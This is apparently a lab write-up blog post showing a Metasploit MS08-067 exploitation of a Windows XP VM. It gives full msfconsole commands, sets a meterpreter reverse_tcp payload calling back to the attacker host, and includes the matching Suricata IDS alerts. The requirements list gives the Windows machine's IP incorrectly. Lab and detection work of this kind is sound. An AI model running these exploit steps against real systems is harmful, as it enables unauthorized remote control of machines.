Penetration Testing on Windows XP SP2/ SP3 by Exploiting a Vulnerability in Windows Samba Service {ms08-67}.

{Requirements:}
————————
All Machines Running on VM

1. Kali Linux (172.16.66.193)
2. Windows XP SP2 (172.16.66.193)
3. IDS - Suricata

{Scan for open ports:}
———————————-
root@fikri:~# nmap -n -sV 172.16.66.199

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-17 10:25 MYT
Nmap scan report for 172.16.66.199
Host is up (0.11s latency).
Not shown: 918 closed ports, 79 filtered ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows 98 netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:D1:55:23 (VMware)
Service Info: OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.51 seconds


{Exploit:}
—————
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 172.16.66.199
RHOST => 172.16.66.199
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.66.199    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 172.16.66.193
LHOST => 172.16.66.193
msf exploit(ms08_067_netapi) > set LPORT 6666
LPORT => 6666
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.66.193:6666
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 172.16.66.199
[*] Meterpreter session 1 opened (172.16.66.193:6666 -> 172.16.66.199:1069) at 2015-12-17 10:41:14 +0800

{Suricata}
—————

12/17/2015-10:41:18.639748  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable Code was Detected] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable Code was Detected] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445

{"timestamp":"2015-12-17T10:25:50.527735","event_type":"http","src_ip":"172.16.66.193","src_port":35357,"dest_ip":"172.16.66.199","dest_port":139,"proto":"TCP","http":{"url":"\/","http_method":"GET","protocol":"HTTP\/1.0","length":0}}
{"timestamp":"2015-12-17T10:25:50.527735","event_type":"http","src_ip":"172.16.66.193","src_port":35357,"dest_ip":"172.16.66.199","dest_port":139,"proto":"TCP","http":{"url":"\/","http_method":"GET","protocol":"HTTP\/1.0","length":0}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2008705,"rev":5,"signature":"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2009247,"rev":3,"signature":"ET SHELLCODE Rothenburg Shellcode","category":"Executable Code was Detected","severity":1}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2008705,"rev":5,"signature":"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2009247,"rev":3,"signature":"ET SHELLCODE Rothenburg Shellcode","category":"Executable Code was Detected","severity":1}}

{References:}
1. https://community.rapid7.com/community/infosec/blog/2014/02/03/new-ms08-067


Comments

Post a Comment

Popular posts from this blog

Port Scanning, Intrusion Detections, and Packet Analysis by Using Nmap, Snort and Wireshark

Image
Motivated from the following article, http://faculty.scf.edu/bodeJ/CIS2352/NMAP%20Detection%20and%20Countermeasures.pdf Then, I’ve setup Virtual Lab to see how to analyze the different type of scanning on packet and IDS perspectives. Kali Linux as an attacker machine that will running Nmap for scanning activities and capturing traffics by using Wireshark. I’ve installed Snort on Ubuntu 12 LTS Server as IDS and enable portscan configurations and store log in /var/log/snort/portscan.log.   Metasploitable Linux as a victim machine. Portscan detection.   For more information, see README.sfportscan preprocessor sfportscan: proto   { all } memcap { 10000000 } sense_level { medium } logfile { /var/log/snort/portscan.log } Configurations of my Virtual Lab:    Kali Linux                  Snort IDS               Metasploitable Linux [192.168.197.209] --->   [192.168.197.217]  --->     [192.168.197.216]             
Read more

Malware Analysis Part 2: Using RemNux

Malware Analysis  Part 2 - By Using Multiple Tools on Remnux Machine {Peframe, Pyew, Upx, Pescanner, ExeScan} ———————————————————————————————————————————————————— remnux@remnux:~/Desktop/Labs/Chapter_1L$ peframe Lab01-02.exe  Short information ------------------------------------------------------------ File Name          Lab01-02.exe File Size          3072 byte Compile Time       2011-01-19 11:10:41 DLL                False Sections           3 Hash MD5           8363436878404da0ae3e46991e355b83 Hash SHA-1         5a016facbcb77e2009a01ea5c67b39af209c3fcb Imphash            096aa05b8a2e1f2dc66fc73a1a978a7b Detected           Packer Directory          Import Packer matched [1] ------------------------------------------------------------ Packer             UPX -> www.upx.sourceforge.net Suspicious API discovered [8] ------------------------------------------------------------ Function           CreateServiceA Function           ExitP
Read more